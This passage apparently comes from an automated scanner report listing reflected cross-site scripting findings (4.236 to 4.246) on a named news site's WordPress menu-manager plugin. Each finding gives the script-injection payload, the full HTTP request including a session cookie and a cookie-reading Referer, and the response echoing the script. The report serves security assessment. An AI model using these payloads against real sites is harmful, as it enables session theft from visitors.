The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee29a"><script>alert(1)</script>587008800ec was submitted in the REST URL parameter 4. This input was echoed as ee29a\"><script>alert(1)</script>587008800ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/displayee29a"><script>alert(1)</script>587008800ec/js/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:04 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/displayee29a\"><script>alert(1)</script>587008800ec/js/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.236. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cc57"><script>alert(1)</script>10a34925f56 was submitted in the REST URL parameter 5. This input was echoed as 4cc57\"><script>alert(1)</script>10a34925f56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js4cc57"><script>alert(1)</script>10a34925f56/menu-manager.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:47 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js4cc57\"><script>alert(1)</script>10a34925f56/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.237. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adb47"><script>alert(1)</script>27ad8d8ecc8 was submitted in the REST URL parameter 6. This input was echoed as adb47\"><script>alert(1)</script>27ad8d8ecc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js/menu-manager.jsadb47"><script>alert(1)</script>27ad8d8ecc8?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js/menu-manager.jsadb47\"><script>alert(1)</script>27ad8d8ecc8?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.238. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33252"><script>alert(1)</script>892296e34a1 was submitted in the REST URL parameter 1. This input was echoed as 33252\"><script>alert(1)</script>892296e34a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content33252"><script>alert(1)</script>892296e34a1/plugins/menu-manager/display/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content33252\"><script>alert(1)</script>892296e34a1/plugins/menu-manager/display/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.239. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e92b"><script>alert(1)</script>c701359bfce was submitted in the REST URL parameter 2. This input was echoed as 8e92b\"><script>alert(1)</script>c701359bfce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins8e92b"><script>alert(1)</script>c701359bfce/menu-manager/display/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins8e92b\"><script>alert(1)</script>c701359bfce/menu-manager/display/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.240. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a836"><script>alert(1)</script>b66ed940538 was submitted in the REST URL parameter 3. This input was echoed as 1a836\"><script>alert(1)</script>b66ed940538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager1a836"><script>alert(1)</script>b66ed940538/display/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:30 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager1a836\"><script>alert(1)</script>b66ed940538/display/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.241. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e92b"><script>alert(1)</script>c8a30cb0fa was submitted in the REST URL parameter 4. This input was echoed as 6e92b\"><script>alert(1)</script>c8a30cb0fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display6e92b"><script>alert(1)</script>c8a30cb0fa/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display6e92b\"><script>alert(1)</script>c8a30cb0fa/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.242. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305f5"><script>alert(1)</script>4362317aaa9 was submitted in the REST URL parameter 5. This input was echoed as 305f5\"><script>alert(1)</script>4362317aaa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js305f5"><script>alert(1)</script>4362317aaa9/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js305f5\"><script>alert(1)</script>4362317aaa9/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.243. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83911"><script>alert(1)</script>6a3ac9adfda was submitted in the REST URL parameter 6. This input was echoed as 83911\"><script>alert(1)</script>6a3ac9adfda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js/superfish.js83911"><script>alert(1)</script>6a3ac9adfda?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js/superfish.js83911\"><script>alert(1)</script>6a3ac9adfda?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.244. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ce8"><script>alert(1)</script>ba74cc712aa was submitted in the REST URL parameter 1. This input was echoed as 16ce8\"><script>alert(1)</script>ba74cc712aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content16ce8"><script>alert(1)</script>ba74cc712aa/plugins/menu-manager/display/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content16ce8\"><script>alert(1)</script>ba74cc712aa/plugins/menu-manager/display/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.245. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73cf6"><script>alert(1)</script>00ef22bfef2 was submitted in the REST URL parameter 2. This input was echoed as 73cf6\"><script>alert(1)</script>00ef22bfef2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins73cf6"><script>alert(1)</script>00ef22bfef2/menu-manager/display/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins73cf6\"><script>alert(1)</script>00ef22bfef2/menu-manager/display/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.246. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54cc"><script>alert(1)</script>3dcd13916d8 was submitted in the REST URL parameter 3. This input was echoed as d54cc\"><script>alert(1)</script>3dcd13916d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-managerd54cc"><script>alert(1)</script>3dcd13916d8/display/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
